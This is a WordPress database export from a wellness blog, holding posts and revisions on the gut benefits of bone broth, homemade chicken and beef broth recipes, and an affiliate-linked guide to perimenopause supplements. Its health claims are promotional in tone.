Incorporating bone broth into your diet can be a delicious and natural way to support your gut health journey. Its collagen content, amino acids, and nourishing nutrients make it a powerful elixir for repairing and maintaining the delicate balance of your gut ecosystem. Whether sipped as a warm beverage, used as a base for soups, or incorporated into various recipes, bone broth has stood the test of time as a gut-loving tonic that nourishes both body and soul. Remember, consistency is key – make bone broth a part of your routine to reap the full array of gut-healing benefits it offers.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my link.

\n\n\n\n

Chick HERE for a Chicken and Beef Bone Broth recipe OR find a list of some great Bone Broths you can buy online below:

\n\n\n\n

Chicken Bone Broth Soup by Kettle and Fire, Keto Diet, Paleo Friendly, Gluten Free, 16.9 Ounce (Pack of 6)

\n\n\n\n\"\"\n\n\n\n

Bare Bones Bone Broth Instant Powdered Mix, Beef, Pack of 16, 15g Sticks, 10g Protein, 100% Grass Fed, Keto & Paleo Friendly Bone Broth Packets

\n\n\n\n\"\"\n\n\n\n


Dr. Kellyann Bone Broth Packets, Original Homestyle Flavor - 7 Servings, Chicken Broth with 100% Grass-fed Hydrolyzed Collagen Peptides Powder, 16g Protein, Keto and Paleo Diet Friendly

\n\n\n\n\"\"\n\n\n\n

Kitchen Basics Original Chicken Bone Broth, 8.25 oz (Pack of 12)

\n\n\n\n\"\"\n\n\n\n

Pacific Foods Organic Chicken Bone Broth, 8oz (Pack of 12)

\n\n\n\n\"\"\n','Nourishing from Within: The Gut-Healing Benefits of Bone Broth','','publish','open','open','','nourishing-from-within-the-gut-healing-benefits-of-bone-broth','','','2023-10-12 08:36:58','2023-10-12 08:36:58','',0,'https://tummyrevolution.com/?p=5464',0,'post','',0),(5465,1,'2023-09-12 09:07:51','2023-09-12 09:07:51','','akshay-chauhan-Z5_lZsqMDJU-unsplash','','inherit','open','closed','','akshay-chauhan-z5_lzsqmdju-unsplash','','','2023-09-12 09:07:51','2023-09-12 09:07:51','',5464,'http://tummyrevolution.com/wp-content/uploads/2023/09/akshay-chauhan-Z5_lZsqMDJU-unsplash.jpg',0,'attachment','image/jpeg',0),(5466,1,'2023-09-12 09:08:24','2023-09-12 09:08:24','healing benefits of bone broth','Bone Broth benefits','','inherit','open','closed','','bluebird-provisions-cjmlupo3eaw-unsplash','','','2023-10-12 08:36:47','2023-10-12 08:36:47','',5464,'http://tummyrevolution.com/wp-content/uploads/2023/09/bluebird-provisions-CjmlUpo3eAw-unsplash.jpg',0,'attachment','image/jpeg',0),(5467,1,'2023-09-12 09:08:49','2023-09-12 09:08:49','','linnette-elizabeth-CWoUrw5Lwx8-unsplash','','inherit','open','closed','','linnette-elizabeth-cwourw5lwx8-unsplash','','','2023-09-12 09:08:49','2023-09-12 09:08:49','',5464,'http://tummyrevolution.com/wp-content/uploads/2023/09/linnette-elizabeth-CWoUrw5Lwx8-unsplash.jpg',0,'attachment','image/jpeg',0),(5468,1,'2023-09-12 09:09:02','2023-09-12 09:09:02','Gut healing Bone broth ','kadir-celep-qFpTSS7BSuM-unsplash','','inherit','open','closed','','kadir-celep-qfptss7bsum-unsplash','','','2023-09-12 10:02:48','2023-09-12 10:02:48','',5464,'http://tummyrevolution.com/wp-content/uploads/2023/09/kadir-celep-qFpTSS7BSuM-unsplash.jpg',0,'attachment','image/jpeg',0),(5469,1,'2023-09-12 09:09:11','2023-09-12 09:09:11','','jon-tyson-quRbjNp-WQA-unsplash','','inherit','open','closed','','jon-tyson-qurbjnp-wqa-unsplash','','','2023-09-12 09:09:11','2023-09-12 09:09:11','',5464,'http://tummyrevolution.com/wp-content/uploads/2023/09/jon-tyson-quRbjNp-WQA-unsplash.jpg',0,'attachment','image/jpeg',0),(5470,1,'2023-09-12 09:11:02','2023-09-12 09:11:02','\n

In the realm of natural remedies for gut health, bone broth has emerged as a time-honored elixir that offers a multitude of benefits. Beyond being a comforting and flavorsome drink, bone broth boasts a range of nutrients that can work wonders for your gut. In this article, we\'ll explore the gut-healing benefits of bone broth and how incorporating it into your diet can contribute to a happier, healthier digestive system.

\n\n\n\n
    \n
  1. Rich in Collagen
  2. \n
\n\n\n\n

Bone broth is brimming with collagen, a protein that forms the structural foundation of our skin, bones, and connective tissues. Collagen plays a crucial role in maintaining the integrity of the gut lining, which acts as a barrier between the bloodstream and the contents of the digestive tract. By bolstering the gut lining, collagen-rich bone broth can help prevent \"leaky gut,\" a condition where the intestinal barrier becomes compromised, potentially leading to inflammation and other health issues.

\n\n\n\n
    \n
  1. Gut-Friendly Amino Acids
  2. \n
\n\n\n\n

When bone broth is simmered, it releases an array of amino acids that are essential for gut health. Glycine, in particular, has anti-inflammatory properties and supports the body\'s natural detoxification processes. Glutamine is another amino acid found in bone broth that is known for its role in repairing and maintaining the gut lining. By providing these building blocks, bone broth supports the repair and maintenance of the gut\'s delicate tissues.

\n\n\n\n
    \n
  1. Gelatin and Digestive Comfort
  2. \n
\n\n\n\n

As bone broth cools, it forms a gelatinous consistency due to the presence of collagen. This gelatin can have a soothing effect on the digestive tract, making it particularly beneficial for individuals with digestive disorders like irritable bowel syndrome (IBS) or inflammatory bowel disease (IBD). The gentle coating provided by gelatin can help ease inflammation and reduce digestive discomfort.

\n\n\n\n
    \n
  1. Nourishing Nutrients
  2. \n
\n\n\n\n

Bone broth is packed with essential nutrients like minerals, vitamins, and electrolytes that support overall health. These nutrients provide the body with the fuel it needs to function optimally, including aiding in digestion and nutrient absorption.

\n\n\n\n
    \n
  1. Improved Hydration
  2. \n
\n\n\n\n

Proper hydration is crucial for gut health, and bone broth offers a flavorful and hydrating option. The electrolytes present in bone broth can help maintain a healthy balance of fluids, promoting optimal digestion and gut function.

\n\n\n\n
    \n
  1. Boost to Beneficial Bacteria
  2. \n
\n\n\n\n

Bone broth contains compounds called glycosaminoglycans (GAGs), which can promote the growth of beneficial bacteria in the gut. A thriving population of good bacteria is essential for a balanced gut microbiome, which plays a central role in overall health.

\n\n\n\n

Conclusion

\n\n\n\n

Incorporating bone broth into your diet can be a delicious and natural way to support your gut health journey. Its collagen content, amino acids, and nourishing nutrients make it a powerful elixir for repairing and maintaining the delicate balance of your gut ecosystem. Whether sipped as a warm beverage, used as a base for soups, or incorporated into various recipes, bone broth has stood the test of time as a gut-loving tonic that nourishes both body and soul. Remember, consistency is key – make bone broth a part of your routine to reap the full array of gut-healing benefits it offers.

\n','Nourishing from Within: The Gut-Healing Benefits of Bone Broth','','inherit','closed','closed','','5464-revision-v1','','','2023-09-12 09:11:02','2023-09-12 09:11:02','',5464,'https://tummyrevolution.com/?p=5470',0,'revision','',0),(5472,1,'2023-09-12 09:33:40','2023-09-12 09:33:40','\n

Bone broth, a time-honored culinary tradition, has resurfaced as a nutritional powerhouse that promotes gut health and overall well-being. Creating your own homemade bone broth is a rewarding and surprisingly simple process that allows you to harness the myriad benefits of this nutrient-rich elixir. In this guide, we\'ll walk you through the art of making both chicken and beef bone broths, offering you a warm, nourishing cup of wellness.

\n\n\n\n
\"Bone
\n\n\n\n

Chicken Bone Broth:

\n\n\n\n

Ingredients:

\n\n\n\n
    \n
  • 1 whole organic chicken or chicken bones (from leftover roasted chicken)
  • \n\n\n\n
  • 2-3 carrots, washed and chopped
  • \n\n\n\n
  • 2-3 celery stalks, washed and chopped
  • \n\n\n\n
  • 1 onion, peeled and halved
  • \n\n\n\n
  • 4-6 cloves of garlic, smashed
  • \n\n\n\n
  • Fresh herbs like thyme, rosemary, or parsley
  • \n\n\n\n
  • Water
  • \n\n\n\n
  • Salt and pepper to taste
  • \n
\n\n\n\n

Instructions:

\n\n\n\n
    \n
  1. Place the chicken or chicken bones in a large pot and cover with water. Add a splash of vinegar (apple cider vinegar works well) to help extract minerals from the bones.
  2. \n\n\n\n
  3. Add the chopped vegetables, onion, garlic, and herbs to the pot.
  4. \n\n\n\n
  5. Bring the water to a gentle boil, then reduce the heat to low. Allow the broth to simmer for at least 6-8 hours, up to 24 hours. The longer you simmer, the richer the flavor and nutrients will be.
  6. \n\n\n\n
  7. Skim off any foam that rises to the surface during the initial stages of simmering.
  8. \n\n\n\n
  9. After simmering, strain the broth through a fine-mesh sieve or cheesecloth to remove bones and solids.
  10. \n\n\n\n
  11. Season the broth with salt and pepper to taste. You can also add a pinch of turmeric or ginger for added flavor and anti-inflammatory benefits.
  12. \n
\n\n\n\n

Beef Bone Broth:

\n\n\n\n

Ingredients:

\n\n\n\n
    \n
  • 2-3 pounds of beef bones (marrow bones, knuckle bones, etc.)
  • \n\n\n\n
  • 2-3 carrots, washed and chopped
  • \n\n\n\n
  • 2-3 celery stalks, washed and chopped
  • \n\n\n\n
  • 1 onion, peeled and halved
  • \n\n\n\n
  • 4-6 cloves of garlic, smashed
  • \n\n\n\n
  • Fresh herbs like thyme, rosemary, or bay leaves
  • \n\n\n\n
  • Water
  • \n\n\n\n
  • Salt and pepper to taste
  • \n
\n\n\n\n

Instructions:

\n\n\n\n
    \n
  1. Roast the beef bones in the oven at 400°F (200°C) for about 30 minutes until they are browned and caramelized. This step enhances the flavor of the broth.
  2. \n\n\n\n
  3. Transfer the roasted bones to a large pot and cover with water. Add a splash of vinegar to help extract minerals.
  4. \n\n\n\n
  5. Add the chopped vegetables, onion, garlic, and herbs to the pot.
  6. \n\n\n\n
  7. Bring the water to a gentle boil, then reduce the heat to low. Allow the broth to simmer for at least 12-24 hours, or even longer.
  8. \n\n\n\n
  9. Skim off any foam that rises to the surface during the initial stages of simmering.
  10. \n\n\n\n
  11. After simmering, strain the broth through a fine-mesh sieve or cheesecloth to remove bones and solids.
  12. \n\n\n\n
  13. Season the broth with salt and pepper to taste. You can also add a dash of soy sauce or Worcestershire sauce for depth of flavor.
  14. \n\n\n\n
  15. \n
\n\n\n\n

Making your own chicken and beef bone broths is a fulfilling culinary endeavor that rewards you with a nourishing elixir that supports gut health and overall wellness. With just a few simple ingredients and a bit of patience, you can craft these flavorful broths that can be sipped on their own or used as a base for a variety of soups, stews, and dishes. Remember, the heart of bone broth lies in its slow simmering process, which extracts the nutrients and rich flavors that make it a beloved tonic for generations.

\n','Gut Nourishing Chicken and Beef Bone Broths','','publish','open','open','','simmering-goodness-a-step-by-step-guide-to-crafting-nourishing-chicken-and-beef-bone-broths','','','2023-09-13 13:05:08','2023-09-13 13:05:08','',0,'https://tummyrevolution.com/?p=5472',0,'post','',0),(5473,3,'2023-09-12 09:35:29','2023-09-12 09:35:29','\n

Perimenopause is a natural phase in a woman\'s life that typically occurs in her 40s or early 50s, leading up to menopause. During this transitional period, hormonal fluctuations can cause a variety of physical and emotional symptoms, such as hot flashes, mood swings, and sleep disturbances. While these changes are a normal part of aging, they can sometimes be challenging to navigate. Thankfully, there are various perimenopause supplements for women that can help alleviate these symptoms and promote overall well-being.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

In this comprehensive guide, we\'ll explore some of the best perimenopause supplements to consider.

\n\n\n\n

1.Black Cohosh
Black cohosh is a popular herbal remedy for managing perimenopausal symptoms. It is believed to help regulate hormone levels, particularly estrogen, which can decline during perimenopause. Studies have shown that black cohosh may be effective in reducing hot flashes, night sweats, and mood swings. It is available in various forms, including capsules, tablets, and tinctures.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

2.Soy Isoflavones
Soy isoflavones are natural compounds found in soybeans and soy products. These compounds have a chemical structure similar to estrogen, making them known as phytoestrogens. Phytoestrogens can help balance hormone levels in the body, potentially reducing the severity of hot flashes and other menopausal symptoms. Women who include soy-based foods or supplements in their diet may experience relief from perimenopausal symptoms.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

3.Evening Primrose Oil
Evening primrose oil is derived from the seeds of the evening primrose plant and is rich in gamma-linolenic acid (GLA). GLA is an essential fatty acid that can help regulate hormone production and reduce inflammation. Many women find that taking evening primrose oil supplements can improve skin health, alleviate breast tenderness, and reduce mood swings.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

4. Vitamin D
Vitamin D is essential for overall health, and it plays a crucial role in bone health and immune function. During perimenopause and menopause, the risk of osteoporosis increases due to declining estrogen levels. Supplementing with vitamin D can help maintain strong bones and reduce the risk of fractures. Additionally, vitamin D may also contribute to better mood and cognitive function.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

5.Calcium and Magnesium
As estrogen levels decrease during perimenopause, the body\'s ability to absorb calcium from food diminishes. This can lead to a higher risk of bone loss and osteoporosis. Calcium and magnesium supplements can help maintain bone density and reduce the risk of fractures. These minerals are also beneficial for muscle function and may help with sleep disturbances and muscle cramps.

\n\n\n\n

Lint to Recommended Product

\n\n\n\n\"\"\n\n\n\n

6.B Vitamins
B vitamins, including B6 and B12, are essential for maintaining energy levels and supporting overall well-being. They play a role in regulating mood and reducing stress and anxiety, which are common perimenopausal symptoms. B vitamin supplements can help combat fatigue and enhance mental clarity during this transitional phase.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

7.Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, are known for their anti-inflammatory properties. They can help alleviate joint pain, reduce mood swings, and support cardiovascular health. Omega-3 supplements may also contribute to healthier skin and hair.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

8.Probiotics
Gut health is closely linked to overall well-being, and during perimenopause, hormonal fluctuations can sometimes disrupt the gut microbiome. Probiotic supplements can help restore and maintain a healthy balance of gut bacteria, potentially reducing bloating, digestive issues, and immune system challenges.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Perimenopause is a natural phase in a woman\'s life, but it doesn\'t have to be a time of discomfort and distress. These perimenopause supplements for women can provide relief from a wide range of symptoms, allowing you to navigate this transitional phase with greater ease and confidence. However, it\'s important to consult with a healthcare provider before adding any new supplements to your routine, as individual needs and responses may vary. In combination with a healthy lifestyle, these supplements can contribute to a smoother perimenopausal journey, helping you embrace the changes that come with this transformative phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Perimenopause Supplements for Women: A Comprehensive Guide','','publish','open','open','','perimenopause-supplements-for-women-a-comprehensive-guide','','','2023-10-10 08:35:01','2023-10-10 08:35:01','',0,'https://tummyrevolution.com/?p=5473',0,'post','',0),(5474,1,'2023-09-12 09:30:48','2023-09-12 09:30:48','','akshay-chauhan-Z5_lZsqMDJU-unsplash-1','','inherit','open','closed','','akshay-chauhan-z5_lzsqmdju-unsplash-1','','','2023-09-12 09:30:48','2023-09-12 09:30:48','',5472,'http://tummyrevolution.com/wp-content/uploads/2023/09/akshay-chauhan-Z5_lZsqMDJU-unsplash-1.jpg',0,'attachment','image/jpeg',0),(5484,1,'2023-09-12 09:47:02','2023-09-12 09:47:02','\n

Bone broth, a time-honored culinary tradition, has resurfaced as a nutritional powerhouse that promotes gut health and overall well-being. Creating your own homemade bone broth is a rewarding and surprisingly simple process that allows you to harness the myriad benefits of this nutrient-rich elixir. In this guide, we\'ll walk you through the art of making both chicken and beef bone broths, offering you a warm, nourishing cup of wellness.

\n\n\n\n
\"Bone
\n\n\n\n

Chicken Bone Broth:

\n\n\n\n

Ingredients:

\n\n\n\n
    \n
  • 1 whole organic chicken or chicken bones (from leftover roasted chicken)
  • \n\n\n\n
  • 2-3 carrots, washed and chopped
  • \n\n\n\n
  • 2-3 celery stalks, washed and chopped
  • \n\n\n\n
  • 1 onion, peeled and halved
  • \n\n\n\n
  • 4-6 cloves of garlic, smashed
  • \n\n\n\n
  • Fresh herbs like thyme, rosemary, or parsley
  • \n\n\n\n
  • Water
  • \n\n\n\n
  • Salt and pepper to taste
  • \n
\n\n\n\n

Instructions:

\n\n\n\n
    \n
  1. Place the chicken or chicken bones in a large pot and cover with water. Add a splash of vinegar (apple cider vinegar works well) to help extract minerals from the bones.
  2. \n\n\n\n
  3. Add the chopped vegetables, onion, garlic, and herbs to the pot.
  4. \n\n\n\n
  5. Bring the water to a gentle boil, then reduce the heat to low. Allow the broth to simmer for at least 6-8 hours, up to 24 hours. The longer you simmer, the richer the flavor and nutrients will be.
  6. \n\n\n\n
  7. Skim off any foam that rises to the surface during the initial stages of simmering.
  8. \n\n\n\n
  9. After simmering, strain the broth through a fine-mesh sieve or cheesecloth to remove bones and solids.
  10. \n\n\n\n
  11. Season the broth with salt and pepper to taste. You can also add a pinch of turmeric or ginger for added flavor and anti-inflammatory benefits.
  12. \n
\n\n\n\n

Beef Bone Broth:

\n\n\n\n

Ingredients:

\n\n\n\n
    \n
  • 2-3 pounds of beef bones (marrow bones, knuckle bones, etc.)
  • \n\n\n\n
  • 2-3 carrots, washed and chopped
  • \n\n\n\n
  • 2-3 celery stalks, washed and chopped
  • \n\n\n\n
  • 1 onion, peeled and halved
  • \n\n\n\n
  • 4-6 cloves of garlic, smashed
  • \n\n\n\n
  • Fresh herbs like thyme, rosemary, or bay leaves
  • \n\n\n\n
  • Water
  • \n\n\n\n
  • Salt and pepper to taste
  • \n
\n\n\n\n

Instructions:

\n\n\n\n
    \n
  1. Roast the beef bones in the oven at 400°F (200°C) for about 30 minutes until they are browned and caramelized. This step enhances the flavor of the broth.
  2. \n\n\n\n
  3. Transfer the roasted bones to a large pot and cover with water. Add a splash of vinegar to help extract minerals.
  4. \n\n\n\n
  5. Add the chopped vegetables, onion, garlic, and herbs to the pot.
  6. \n\n\n\n
  7. Bring the water to a gentle boil, then reduce the heat to low. Allow the broth to simmer for at least 12-24 hours, or even longer.
  8. \n\n\n\n
  9. Skim off any foam that rises to the surface during the initial stages of simmering.
  10. \n\n\n\n
  11. After simmering, strain the broth through a fine-mesh sieve or cheesecloth to remove bones and solids.
  12. \n\n\n\n
  13. Season the broth with salt and pepper to taste. You can also add a dash of soy sauce or Worcestershire sauce for depth of flavor.
  14. \n\n\n\n
  15. \n
\n\n\n\n

Making your own chicken and beef bone broths is a fulfilling culinary endeavor that rewards you with a nourishing elixir that supports gut health and overall wellness. With just a few simple ingredients and a bit of patience, you can craft these flavorful broths that can be sipped on their own or used as a base for a variety of soups, stews, and dishes. Remember, the heart of bone broth lies in its slow simmering process, which extracts the nutrients and rich flavors that make it a beloved tonic for generations.

\n','Gut Nourishing Chicken and Beef Bone Broths','','inherit','closed','closed','','5472-revision-v1','','','2023-09-12 09:47:02','2023-09-12 09:47:02','',5472,'https://tummyrevolution.com/?p=5484',0,'revision','',0),(5475,1,'2023-09-12 09:33:40','2023-09-12 09:33:40','\n

Bone broth, a time-honored culinary tradition, has resurfaced as a nutritional powerhouse that promotes gut health and overall well-being. Creating your own homemade bone broth is a rewarding and surprisingly simple process that allows you to harness the myriad benefits of this nutrient-rich elixir. In this guide, we\'ll walk you through the art of making both chicken and beef bone broths, offering you a warm, nourishing cup of wellness.

\n\n\n\n
\"Bone
\n\n\n\n

Chicken Bone Broth:

\n\n\n\n

Ingredients:

\n\n\n\n
    \n
  • 1 whole organic chicken or chicken bones (from leftover roasted chicken)
  • \n\n\n\n
  • 2-3 carrots, washed and chopped
  • \n\n\n\n
  • 2-3 celery stalks, washed and chopped
  • \n\n\n\n
  • 1 onion, peeled and halved
  • \n\n\n\n
  • 4-6 cloves of garlic, smashed
  • \n\n\n\n
  • Fresh herbs like thyme, rosemary, or parsley
  • \n\n\n\n
  • Water
  • \n\n\n\n
  • Salt and pepper to taste
  • \n
\n\n\n\n

Instructions:

\n\n\n\n
    \n
  1. Place the chicken or chicken bones in a large pot and cover with water. Add a splash of vinegar (apple cider vinegar works well) to help extract minerals from the bones.
  2. \n\n\n\n
  3. Add the chopped vegetables, onion, garlic, and herbs to the pot.
  4. \n\n\n\n
  5. Bring the water to a gentle boil, then reduce the heat to low. Allow the broth to simmer for at least 6-8 hours, up to 24 hours. The longer you simmer, the richer the flavor and nutrients will be.
  6. \n\n\n\n
  7. Skim off any foam that rises to the surface during the initial stages of simmering.
  8. \n\n\n\n
  9. After simmering, strain the broth through a fine-mesh sieve or cheesecloth to remove bones and solids.
  10. \n\n\n\n
  11. Season the broth with salt and pepper to taste. You can also add a pinch of turmeric or ginger for added flavor and anti-inflammatory benefits.
  12. \n
\n\n\n\n

Beef Bone Broth:

\n\n\n\n

Ingredients:

\n\n\n\n
    \n
  • 2-3 pounds of beef bones (marrow bones, knuckle bones, etc.)
  • \n\n\n\n
  • 2-3 carrots, washed and chopped
  • \n\n\n\n
  • 2-3 celery stalks, washed and chopped
  • \n\n\n\n
  • 1 onion, peeled and halved
  • \n\n\n\n
  • 4-6 cloves of garlic, smashed
  • \n\n\n\n
  • Fresh herbs like thyme, rosemary, or bay leaves
  • \n\n\n\n
  • Water
  • \n\n\n\n
  • Salt and pepper to taste
  • \n
\n\n\n\n

Instructions:

\n\n\n\n
    \n
  1. Roast the beef bones in the oven at 400°F (200°C) for about 30 minutes until they are browned and caramelized. This step enhances the flavor of the broth.
  2. \n\n\n\n
  3. Transfer the roasted bones to a large pot and cover with water. Add a splash of vinegar to help extract minerals.
  4. \n\n\n\n
  5. Add the chopped vegetables, onion, garlic, and herbs to the pot.
  6. \n\n\n\n
  7. Bring the water to a gentle boil, then reduce the heat to low. Allow the broth to simmer for at least 12-24 hours, or even longer.
  8. \n\n\n\n
  9. Skim off any foam that rises to the surface during the initial stages of simmering.
  10. \n\n\n\n
  11. After simmering, strain the broth through a fine-mesh sieve or cheesecloth to remove bones and solids.
  12. \n\n\n\n
  13. Season the broth with salt and pepper to taste. You can also add a dash of soy sauce or Worcestershire sauce for depth of flavor.
  14. \n\n\n\n
  15. \n
\n\n\n\n

Making your own chicken and beef bone broths is a fulfilling culinary endeavor that rewards you with a nourishing elixir that supports gut health and overall wellness. With just a few simple ingredients and a bit of patience, you can craft these flavorful broths that can be sipped on their own or used as a base for a variety of soups, stews, and dishes. Remember, the heart of bone broth lies in its slow simmering process, which extracts the nutrients and rich flavors that make it a beloved tonic for generations.

\n','Simmering Goodness: A Step-by-Step Guide to Crafting Nourishing Chicken and Beef Bone Broths','','inherit','closed','closed','','5472-revision-v1','','','2023-09-12 09:33:40','2023-09-12 09:33:40','',5472,'https://tummyrevolution.com/?p=5475',0,'revision','',0),(5476,3,'2023-09-12 09:34:28','2023-09-12 09:34:28','','michal-parzuchowski-7TWRwDjfGew-unsplash','','inherit','open','closed','','michal-parzuchowski-7twrwdjfgew-unsplash','','','2023-09-12 09:34:28','2023-09-12 09:34:28','',5473,'http://tummyrevolution.com/wp-content/uploads/2023/09/michal-parzuchowski-7TWRwDjfGew-unsplash.jpg',0,'attachment','image/jpeg',0),(5501,3,'2023-09-12 14:13:46','2023-09-12 14:13:46','\n

Perimenopause is a natural phase in a woman\'s life that typically occurs in her 40s or early 50s, leading up to menopause. During this transitional period, hormonal fluctuations can cause a variety of physical and emotional symptoms, such as hot flashes, mood swings, and sleep disturbances. While these changes are a normal part of aging, they can sometimes be challenging to navigate. Thankfully, there are various perimenopause supplements for women that can help alleviate these symptoms and promote overall well-being. In this comprehensive guide, we\'ll explore some of the best perimenopause supplements to consider.

\n\n\n\n

1.Black Cohosh
Black cohosh is a popular herbal remedy for managing perimenopausal symptoms. It is believed to help regulate hormone levels, particularly estrogen, which can decline during perimenopause. Studies have shown that black cohosh may be effective in reducing hot flashes, night sweats, and mood swings. It is available in various forms, including capsules, tablets, and tinctures.

\n\n\n\n

2.Soy Isoflavones
Soy isoflavones are natural compounds found in soybeans and soy products. These compounds have a chemical structure similar to estrogen, making them known as phytoestrogens. Phytoestrogens can help balance hormone levels in the body, potentially reducing the severity of hot flashes and other menopausal symptoms. Women who include soy-based foods or supplements in their diet may experience relief from perimenopausal symptoms.

\n\n\n\n

3.Evening Primrose Oil
Evening primrose oil is derived from the seeds of the evening primrose plant and is rich in gamma-linolenic acid (GLA). GLA is an essential fatty acid that can help regulate hormone production and reduce inflammation. Many women find that taking evening primrose oil supplements can improve skin health, alleviate breast tenderness, and reduce mood swings.

\n\n\n\n

4. Vitamin D
Vitamin D is essential for overall health, and it plays a crucial role in bone health and immune function. During perimenopause and menopause, the risk of osteoporosis increases due to declining estrogen levels. Supplementing with vitamin D can help maintain strong bones and reduce the risk of fractures. Additionally, vitamin D may also contribute to better mood and cognitive function.

\n\n\n\n

5.Calcium and Magnesium
As estrogen levels decrease during perimenopause, the body\'s ability to absorb calcium from food diminishes. This can lead to a higher risk of bone loss and osteoporosis. Calcium and magnesium supplements can help maintain bone density and reduce the risk of fractures. These minerals are also beneficial for muscle function and may help with sleep disturbances and muscle cramps.

\n\n\n\n

6.B Vitamins
B vitamins, including B6 and B12, are essential for maintaining energy levels and supporting overall well-being. They play a role in regulating mood and reducing stress and anxiety, which are common perimenopausal symptoms. B vitamin supplements can help combat fatigue and enhance mental clarity during this transitional phase.

\n\n\n\n

7.Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, are known for their anti-inflammatory properties. They can help alleviate joint pain, reduce mood swings, and support cardiovascular health. Omega-3 supplements may also contribute to healthier skin and hair.

\n\n\n\n

8.Probiotics
Gut health is closely linked to overall well-being, and during perimenopause, hormonal fluctuations can sometimes disrupt the gut microbiome. Probiotic supplements can help restore and maintain a healthy balance of gut bacteria, potentially reducing bloating, digestive issues, and immune system challenges.

\n\n\n\n

Conclusion

\n\n\n\n

Perimenopause is a natural phase in a woman\'s life, but it doesn\'t have to be a time of discomfort and distress. These perimenopause supplements for women can provide relief from a wide range of symptoms, allowing you to navigate this transitional phase with greater ease and confidence. However, it\'s important to consult with a healthcare provider before adding any new supplements to your routine, as individual needs and responses may vary. In combination with a healthy lifestyle, these supplements can contribute to a smoother perimenopausal journey, helping you embrace the changes that come with this transformative phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Perimenopause Supplements for Women: A Comprehensive Guide','','inherit','closed','closed','','5473-revision-v1','','','2023-09-12 14:13:46','2023-09-12 14:13:46','',5473,'https://tummyrevolution.com/?p=5501',0,'revision','',0),(5477,3,'2023-09-12 09:35:29','2023-09-12 09:35:29','\n

Perimenopause is a natural phase in a woman\'s life that typically occurs in her 40s or early 50s, leading up to menopause. During this transitional period, hormonal fluctuations can cause a variety of physical and emotional symptoms, such as hot flashes, mood swings, and sleep disturbances. While these changes are a normal part of aging, they can sometimes be challenging to navigate. Thankfully, there are various perimenopause supplements for women that can help alleviate these symptoms and promote overall well-being. In this comprehensive guide, we\'ll explore some of the best perimenopause supplements to consider.

\n\n\n\n

1.Black Cohosh

\n\n\n\n

\n\n\n\n

Black cohosh is a popular herbal remedy for managing perimenopausal symptoms. It is believed to help regulate hormone levels, particularly estrogen, which can decline during perimenopause. Studies have shown that black cohosh may be effective in reducing hot flashes, night sweats, and mood swings. It is available in various forms, including capsules, tablets, and tinctures.

\n\n\n\n

2.Soy Isoflavones

\n\n\n\n

\n\n\n\n

Soy isoflavones are natural compounds found in soybeans and soy products. These compounds have a chemical structure similar to estrogen, making them known as phytoestrogens. Phytoestrogens can help balance hormone levels in the body, potentially reducing the severity of hot flashes and other menopausal symptoms. Women who include soy-based foods or supplements in their diet may experience relief from perimenopausal symptoms.

\n\n\n\n

3.Evening Primrose Oil

\n\n\n\n

Evening primrose oil is derived from the seeds of the evening primrose plant and is rich in gamma-linolenic acid (GLA). GLA is an essential fatty acid that can help regulate hormone production and reduce inflammation. Many women find that taking evening primrose oil supplements can improve skin health, alleviate breast tenderness, and reduce mood swings.

\n\n\n\n

Vitamin D is essential for overall health, and it plays a crucial role in bone health and immune function. During perimenopause and menopause, the risk of osteoporosis increases due to declining estrogen levels. Supplementing with vitamin D can help maintain strong bones and reduce the risk of fractures. Additionally, vitamin D may also contribute to better mood and cognitive function.

\n\n\n\n

5.Calcium and Magnesium

\n\n\n\n

As estrogen levels decrease during perimenopause, the body\'s ability to absorb calcium from food diminishes. This can lead to a higher risk of bone loss and osteoporosis. Calcium and magnesium supplements can help maintain bone density and reduce the risk of fractures. These minerals are also beneficial for muscle function and may help with sleep disturbances and muscle cramps.

\n\n\n\n

6.B Vitamins

\n\n\n\n

B vitamins, including B6 and B12, are essential for maintaining energy levels and supporting overall well-being. They play a role in regulating mood and reducing stress and anxiety, which are common perimenopausal symptoms. B vitamin supplements can help combat fatigue and enhance mental clarity during this transitional phase.

\n\n\n\n

7.Omega-3 Fatty Acids

\n\n\n\n

\n\n\n\n

Omega-3 fatty acids, found in fish oil supplements, are known for their anti-inflammatory properties. They can help alleviate joint pain, reduce mood swings, and support cardiovascular health. Omega-3 supplements may also contribute to healthier skin and hair.

\n\n\n\n

8.Probiotics

\n\n\n\n

Gut health is closely linked to overall well-being, and during perimenopause, hormonal fluctuations can sometimes disrupt the gut microbiome. Probiotic supplements can help restore and maintain a healthy balance of gut bacteria, potentially reducing bloating, digestive issues, and immune system challenges.

\n\n\n\n

Conclusion

\n\n\n\n

Perimenopause is a natural phase in a woman\'s life, but it doesn\'t have to be a time of discomfort and distress. These perimenopause supplements for women can provide relief from a wide range of symptoms, allowing you to navigate this transitional phase with greater ease and confidence. However, it\'s important to consult with a healthcare provider before adding any new supplements to your routine, as individual needs and responses may vary. In combination with a healthy lifestyle, these supplements can contribute to a smoother perimenopausal journey, helping you embrace the changes that come with this transformative phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

